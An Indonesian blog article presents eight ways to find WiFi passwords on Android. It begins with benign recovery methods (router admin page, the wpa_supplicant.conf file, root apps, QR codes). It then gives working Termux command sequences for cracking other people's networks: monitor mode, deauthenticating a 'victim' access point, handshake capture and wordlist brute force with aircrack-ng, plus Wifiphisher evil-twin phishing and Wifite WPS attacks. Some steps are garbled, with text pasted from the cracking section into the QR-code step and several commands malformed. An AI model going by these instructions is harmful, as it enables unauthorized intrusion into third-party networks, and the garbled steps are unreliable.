8 Cara Mengetahui Password WiFi yang Sudah Login di Android

8 Cara Mengetahui Password WiFi yang Sudah Login di Android
Daftar Isi Artikel

Magelang1337.com - Cara Mengetahui Password WiFi Yang Lupa di Android. Konektifitas seperti WiFi tenru sudah jadi hal biasa bagi para pemakai gadget saat ini. Selain tersedia di tempat-temtpat tertentu seperti Alun – Alun, Cafe, Restoran, Bandara, dan lainnya, ternyata WiFi juga dapat kita pasang dirumah sendiri. Pasti sudah banyak teman dari kita yang juga sudah memasang Wifi dirumah, contohnya seperti IndiHome.

Sebagian dari pemakai HP Android pasti ada yang mengalami lupa dengan Password Wifi-nya. Jika lupa dengan password Wifi pasti ini jadi masalah karena HP Android kamu tak bisa connect kembali dengan Jaringan WIfi yang ada pada tempat tersebut. Terlebih jika jaringan itu bersifat Private dan kamu mendapatkannya dengan sembunyi - sembunyi.

Tapi kamu tenang tidak perlu khawatir, karena kali ini kami akan membantu masalah tentang Masalah Lupa kata sandi Wifi di Android. Jika sebelumnya kamu pernah terkoneksi dengan jaringan WIfi tersebut tetapi sekarang lupa dengan Passwordnya, maka semua dapat diatasi dengan mudah dan cepat. Caranya kamu akan membutuhkan aplikasi dari pihak ketiga untuk mendapatkan Password Wifi-nya lagi.

Cara Melihat password WiFi Tersimpan Di Android

Banyak yang berpikir, jika password WiFi sudah lupa, itu tak akan bisa balik lagi. Padahal, pemahaman ini salah. Pada HP Android mempunyai banyak fitur rahasia yang jarang diketahui. 

Termasuk aplikasi yang senantiasa dibuat dan dikembngkan setiap waktu, supaya semakin canggih fungsinya. Dengan begitu, untuk cek password WiFi yang lupa, bukanlah hal yang sulit lagi saat ini.

1. Mengetahui Password WiFi yang Tersimpan (No root)

Yang pertama caranya jika akses WiFi kamu melalui router, maka kamu dapat mecoba menggunakan halaman admin untuk merubah sandinya. Fungsi dari halaman admin banyak sekali. Salah satu fitur didalamnya kita bisa menemukan info password WiFi yang sekarang sedang dipakai.

Berikut Panduannya :
  1. Silakan nyalakan router (atau MiFi) > Lalu sambungkan WiFi di HP. dan buka Browser > buka halaman 192.168.1.1.
  2. Selanjutnya cari kolom untuk mengatur kata sandi. Letaknya berbeda-beda. Tetapi biasanya ada di pengaturan SSID. Jika sudah menemukan menunya, Kamu bisa melihat atau merubah password WiFi dikolom yang tersedia.

Alamat login admin juga bisa berbeda-beda biasanya tergantung dari router yang digunakan. Jika menggunakan link diatas gagal kamu bisa menggunakan dibawah ini. Misalnya:

192.168.0.1
192.168.2.1

Jika masih gagal juga, Kamu coba cek router atau modem. Di sana biasanya sudah ada alamat login admin.

2. Melihat Password WiFi yang Tersimpan dengan Aplikasi

Sama dengan cara yang pertama, aplikasi ini dapat melihat password WiFi, sampai mengatur setelan pada router WiFi. Dengan aplikasi ini, Kamu jadi lebih praktis dalam membuka setting pada router WiFi, tak harus melalui browser (halaman admin) seperti yang sebelumnya.


Cara menggunakan aplikasi WiFi Router Settings :
  1.  Download aplikasi WiFi Router Settings melalui playstore 
  2.  Buka aplikasinya dan Sambungkan WiFi ke router.
  3.  Kemudian Buka menu Router Settings.
  4.  Selanjutnya cek password WiFi.
Aplikasi ini sudah mendukung banyak router. Di antaranya adalah modem ZTE yang biasa digunakan Indihome. 

3. Trik Mengetahui Password WiFi dengan APK ES File Explorer

Melihat Password wifi yang sudah terhubung Android :
  1. Kamu memasukkan password WiFi.
  2. Lalu Kamu Sambungkan WiFi.
  3. Jika sudah tersambung, maka password tersebut akan tersimpan di direktori Android.
  4. Sehingga dengan memahami cara kerja aplikasi itu, kita dapat menyimpulkan jika mudah sekali untuk melihat password WiFi.

Cukup dengan membuka direktori Android tersebut, maka akan tampil password WiFi. Cara selanjutnya kamu bisa langsung membuka aplikasi ES FIle Explore. 

Lalu buka kategori Sistem > cari folder Data/Misc/WiFi > Lalu file WPA_Supplicant.conf Atau bisa langsung cari WPA_Supplicant.Conf > Buka file WPA_Supplicant.Conf tadi dengan mode Text Viewer/HTML Viewer untuk mengetahui jaringan SSID, dan password.


Nanti akan terlihat seluruh password WiFi yang sudah pernah tersambung di Android Kamu.

4. Melihat Password dengan WiFi Key Recovery

WiFi Key Recovery adalah solusi dan bakal jadi andalan untuk kamu yang sering lupa dengan Password Wifi di HP dan Tablet Android. Aplikasi ini bisa bekerja untuk mencari semua List Wifi yang pernah kamu hubungkan di HP Android dan sangat lengkap dengan Tipe Password Wifi Tersebut. 

Pada intinya adalah, jika aplikasi ini kamu pakai maka Aplikasi akan memperlihatkan semua daftar nama jaringan lengkap dengan Passwordnya. Syarat untuk bisa menggunakan aplikasi ini HP kamu dalam keadaan Root.
  1. Download WiFi Key Recovery Di Google Play Store
  2. Buka aplikasi tersebut, Lalu saat muncul popup SuperSU >> klik tombol Grant.
  3. Nantinya secara otomatis aplikasi WiFi Key Recovery akan menampilkan semua daftar Wifi yang pernah terhubung di Android kamu lengkap dengan Password.
  4. Sekarang, Kamu bisa salin Password tersebut untuk kamu koneksikan lagi pada Wifi yang terdeteksi.
Cara ini bisa kamu gunkan pada semua perangkat Android syarat perangkat tersebut sudah Root. Perangkat Android yang bisa dipakai pada aplikasi tersebut adalah Samsung Galaxy, Oppo, Lenovo, Asus Zenfone, Xiomi, Smartfreen Andromax, HTC, LG, Meizu, Motorola, Advan, Acer, Sony Experia, dan lainnya.

Tak cuma aplikasi WiFi Key Recovery, ada banyak aplikasi lagi yang mempunyai fungsi dan cara kerja yang sama contohnya WiFi Hacker for Free, WiFi Hacker Professional dan WiFi Password Breaker. Kamu bisa Unduh aplikasi melalui Google Play Store.

5. Mengetahui Password WiFi Menggunakan Barcode

Sebagian HP Android sekarang sudah dibekali barcode untuk melihat password WiFi. Barcode ini berisi informasi mengenai WiFi. Mungkin disini banyak yang belum mengetahuinya, Jika kita ternyata bisa tersambung password WiFi lewat barcode. 
  1. Install aplikasi Barcode Scanner di Playstore.
  2. Buka aplikasinya Kemudian pada HP kedua > Masuk ke menu WiFi > Dan buka menu Barcode.
  3. Arahkan scanner HP pertama ke barcode. Lalu buat folder dan beri nama "cap" di kartu sd dan buat juga password list untuk Nanti akan muncul informasi dari WiFi, lengkap dengan sandinya.
Cara ini dapat digunakan di Android dengan merk apa saja, dan pasti tanpa root!

Cara Mengetahui Password WiFi dengan Termux

Cara untuk menemukan password WiFi saat ini juga bisa dengan aplikasi terminal android yaitu dengan Termux. Termux biasa dipakai oleh programer yang memakai smartphone android untiuk alat coding dan lainnya selain perangkat PC yang dimilikinya. 


Ada beberapa cara untuk melihat password wifi pada termux seperti Aircrack-ng, Wifite dan wifiphisher. Dan Berikut beberapa cara dan panduan lengkap menggunakan termux.

1. Melihat Password Wifi Dengan Aircrack-ng Termux Android


Aircrack-ng Merupakan tools yang sering dipakai untuk memecah password di sebuah jaringan WiFi dengan cukup ampuh. Tool ini menggunakan metode bruteforce untuk menjebol password WiFi.

Sehingga Aircrack-ng akan mencoba semua password yang ada di wordlist dan mencocokannya sampai menemukan password Wifi yang cocok. Jadi untuk menggunakan cara ini kamu harus  membuat wordlist password untuk bisa mengetahui password WiFi.

Cara menggunakannya Install terlebih dahulu aplikasi Termux, Buka aplikasinya dan ketikan:
$ Pkg install git
$ Pkg install build-essential
$ git clone https://github.com/aircrack-ng/aircrack-ng.git 
Setelah terinstal ketikan lagi :
$ cd aircrack-ng
$ Pkg install libssl-dev libpcre3-dev libsqlite3-dev libnl-3-dev libnl-genl-3-dev pkg-config -y
$ make
$ make install
Kemudian untuk Mengetahui password wifi ikuti caranya. Sambungkan adaptor wifi kamu ke perangkat. Buka terminal Debian Gnu Root atau terminal akar dan masuk ke mode monitor dengan mengetik : 
airmon-ng
airmon-ng start wlan0 
Ketika sudah mulai mendeteksi jaringan wifi disekitar kamu ketik :
airodump-ng wlan0mon
Jika sudah akan melihat sinyal wifi target untuk berhenti mendeteksi tekan Ctrl + Z. Lalu buat folder dan beri nama "cap" di kartu sd dan buat juga password list untuk bruteforce dan proses WiFi Handshake.

Catat BSSID korban dan catat juga nomor CH Wifi target atau channel dengan mengetik:
airodump-ng -c 6 –bssid 00:26:44:AB:C5:C0 -w /root/sdcard/cap/ wlan0mon -w 
Selanjutnya buka terminal lain dan putuskan semua device dan jalankan perintah WIFI Handshake ketikan:
aireplay-ng -0 5 -a 00:26:44:AB:C5:C0 -wlan0mon 
Tunggu terlebih dahulu dan untuk menghentikan tekan Ctrl + Z lalu tutup terminal. 

Langkah terakhir letakkan password list yang kamu buat tadi pada folder cap dan masuk ke folder kemudian Start BruteForce dengan dengan command:

aircrack-ng -w root/sdcard/cap/pass.lst 01.cap 
Jika ada password yang cocok maka kamu akan menemukan password WiFinya jika tidak. Coba cara lain.

2. Mengetahui Password dengan Wifiphisher Termux


Wifiphisher adalah tools security yang bisa membuat serangan phising secara otomatis pada jaringan WiFi untuk dapatkan passphrases yang dipakai pemilik WiFi. 

Cara kerja dari script Wifiphisher yaitu dengan membuat AP (Access Point) Wifi kembar seperti Wifi Evil Twin Attack.

Cara menggunakannya kamu harus menginstall kali linux pada aplikasi termux. Selanjutnya ketikan :
$ pkg install python
$ Git clone https://github/sophron/wifiphisher.git
$ Cd wifiphisher/
$ ls -l
$ Python wifiphisher.py
Pilih Y untuk menginstall hostpad dan ketikan lagi :
 $ Python wifiphisher.py
Kamu akan memulai server di port 8080 dan 443 lalu akan mencari WiFi yang tersedia. Wifiphisher akan bekerja dan menampilkan semua WiFi yang sudah didapat. Pilih AP dan "get the password" lalu ketikan “num” dari AP.

3. Cara Menemukan Password WiFi dengan Wifite Termux


Cara Mengetahui sandi WiFi secara Otomatis menggunakan Termux dengan script Wifite. Cara ini lebih simple Kelebihan dari Wifite dapat mendeteksi keberadaan SSID, sehingga nanti Script akan mencoba seluruh teknik wifi hacking yang sesuai. 

Baca Juga : Tips Hacking Hotspot WiFi dengan Mudah

Contohnya SSID tersebut menggunakan WPS, jadi Wifite bakal mencoba melakukan PIN attack, begitu seterusnya sampai nanti akan menemukan metode yang cocok. Cara menggunakannya Sama seperti sebelumnya kamu install aplikasi termux dan install juga linux pada termux. lalu ketikan :
$ Pkg install git
$ Pkg install python2
$ git clone https://github.com/derv82/wifite
$ cd wifite
$ chmod 777 wifite.py
$ python2 wifite.py
$ $ ./wifite.py
Demikianlah artikel mengenai Cara Mudah untuk Mengetahui Password WiFi pada HP dan Tablet yang sebelumnya pernah terhubung. Tanpa Root/menggunakan aplikasi. Semoga Bermanfaat. Selamat Mencoba!